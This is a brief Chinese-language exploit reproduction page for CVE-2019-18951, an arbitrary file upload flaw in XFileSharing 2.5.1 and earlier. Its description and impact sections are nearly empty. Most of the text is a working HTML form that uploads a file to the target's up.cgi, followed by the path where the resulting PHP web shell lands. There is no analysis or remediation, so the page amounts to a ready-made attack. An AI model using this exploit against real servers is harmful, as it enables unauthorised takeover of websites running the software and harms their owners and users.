CVE-2019-18951 Xfilesharing 2.5.1本地文件上传getshell¶
一、漏洞简介¶
二、漏洞影响¶
Version: <=2.5.1
三、复现过程¶
任意文件上传
<form action="http://url/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
Shell地址 : http://url/cgi-bin/temp/joe/shell.php